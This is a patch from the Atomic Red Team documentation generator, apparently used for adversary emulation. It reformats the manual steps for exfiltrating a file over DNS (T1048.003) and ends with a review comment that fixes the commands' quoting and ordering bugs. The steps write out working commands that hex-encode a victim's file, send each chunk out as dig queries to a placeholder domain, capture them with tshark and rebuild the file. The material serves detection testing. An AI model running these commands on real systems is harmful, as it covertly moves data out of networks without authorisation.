From a96f4212a5dc48ae8bfb7e55ccb15ba03439f143 Mon Sep 17 00:00:00 2001
From: Atomic Red Team doc generator
Date: Wed, 3 Jul 2024 01:18:53 +0000
Subject: [PATCH] Generated docs from job=generate-docs branch=master [ci skip]
---
 atomics/Indexes/index.yaml | 20 ++++++++++++--------
 atomics/Indexes/linux-index.yaml | 20 ++++++++++++--------
 atomics/T1048.003/T1048.003.md | 4 ++--
 3 files changed, 26 insertions(+), 18 deletions(-)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index b77f0733..89efc53a 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -117632,14 +117632,18 @@ exfiltration:
 supported_platforms:
 - linux
 executor:
- steps: "1. On the adversary machine run the below command.\n\n tshark -f
- \"udp port 53\" -Y \"dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name
- matches \".domain\"\" >> received_data.txt\n\n2. On the victim machine run
- the below commands.\n\n xxd -p input_file > encoded_data.hex | for data
- in `cat encoded_data.hex`; do dig $data.domain; done\n \n3. Once the
- data is received, use the below command to recover the data.\n\n cat
- output_file | cut -d \"A\" -f 2 | cut -d \" \" -f 2 | cut -d \".\" -f 1
- | sort | uniq | xxd -p -r\n"
+ steps: |
+ 1. On the adversary machine run the below command.
+
+ tshark -f "udp port 53" -Y "dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name matches \\".domain\\"" >> received_data.txt
+
+ 2. On the victim machine run the below commands.
+
+ xxd -p input_file > encoded_data.hex | for data in `cat encoded_data.hex`; do dig $data.domain; done
+
+ 3. Once the data is received, use the below command to recover the data.
+
+ cat output_file | cut -d "A" -f 2 | cut -d " " -f 2 | cut -d "." -f 1 | sort | uniq | xxd -p -r
 name: manual
 - name: Exfiltration Over Alternative Protocol - HTTP
 auto_generated_guid: 6aa58451-1121-4490-a8e9-1dada3f1c68c
diff --git a/atomics/Indexes/linux-index.yaml b/atomics/Indexes/linux-index.yaml
index 78b86181..aef87993 100644
--- a/atomics/Indexes/linux-index.yaml
+++ b/atomics/Indexes/linux-index.yaml
@@ -73666,14 +73666,18 @@ exfiltration:
 supported_platforms:
 - linux
 executor:
- steps: "1. On the adversary machine run the below command.\n\n tshark -f
- \"udp port 53\" -Y \"dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name
- matches \".domain\"\" >> received_data.txt\n\n2. On the victim machine run
- the below commands.\n\n xxd -p input_file > encoded_data.hex | for data
- in `cat encoded_data.hex`; do dig $data.domain; done\n \n3. Once the
- data is received, use the below command to recover the data.\n\n cat
- output_file | cut -d \"A\" -f 2 | cut -d \" \" -f 2 | cut -d \".\" -f 1
- | sort | uniq | xxd -p -r\n"
+ steps: |
+ 1. On the adversary machine run the below command.
+
+ tshark -f "udp port 53" -Y "dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name matches \\".domain\\"" >> received_data.txt
+
+ 2. On the victim machine run the below commands.
+
+ xxd -p input_file > encoded_data.hex | for data in `cat encoded_data.hex`; do dig $data.domain; done
+
+ 3. Once the data is received, use the below command to recover the data.
+
+ cat output_file | cut -d "A" -f 2 | cut -d " " -f 2 | cut -d "." -f 1 | sort | uniq | xxd -p -r
 name: manual
 - name: Python3 http.server
 auto_generated_guid: 3ea1f938-f80a-4305-9aa8-431bc4867313
diff --git a/atomics/T1048.003/T1048.003.md b/atomics/T1048.003/T1048.003.md
index b25ca41f..377020c7 100644
--- a/atomics/T1048.003/T1048.003.md
+++ b/atomics/T1048.003/T1048.003.md
@@ -114,12 +114,12 @@ Exfiltration of specified file over DNS protocol.
 #### Run it with these steps!
 1. On the adversary machine run the below command.
- tshark -f "udp port 53" -Y "dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name matches ".domain"" >> received_data.txt
+ tshark -f "udp port 53" -Y "dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name matches \\".domain\\"" >> received_data.txt
 2. On the victim machine run the below commands.
 xxd -p input_file > encoded_data.hex | for data in `cat encoded_data.hex`; do dig $data.domain; done
-
+
 3. Once the data is received, use the below command to recover the data.
 cat output_file | cut -d "A" -f 2 | cut -d " " -f 2 | cut -d "." -f 1 | sort | uniq | xxd -p -r
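Review bot: The re-escaped tshark filter on the added line still does not survive a paste into a shell: inside double quotes `\\` collapses to one backslash and the `"` right after it closes the string, so tshark is handed something like `... dns.qry.name matches \.domain\` rather than a quoted pattern (assuming the code block is rendered verbatim, which is worth confirming). Nested double quotes are avoided altogether with `tshark -f "udp port 53" -Y 'dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name matches ".domain"' >> received_data.txt`; since this file and both index files are generated, the fix belongs in the atomic's source YAML, which this commit does not touch. Two further defects are carried over in the unchanged context lines: step 2 pipes `xxd` into the `for` loop (`> encoded_data.hex |`), so the loop can read the file before it is written and should be `xxd -p input_file > encoded_data.hex && for data in $(cat encoded_data.hex); do dig "$data.domain"; done`, and step 3's `sort | uniq` lexically reorders the hex chunks and drops legitimately repeated chunks, so the recovered file is scrambled for anything beyond tiny inputs. An order-preserving de-duplication such as `awk '!seen[$0]++'` (or a sequence-number prefix in each label) is needed there, and step 3 reads `output_file` while step 1 writes `received_data.txt`.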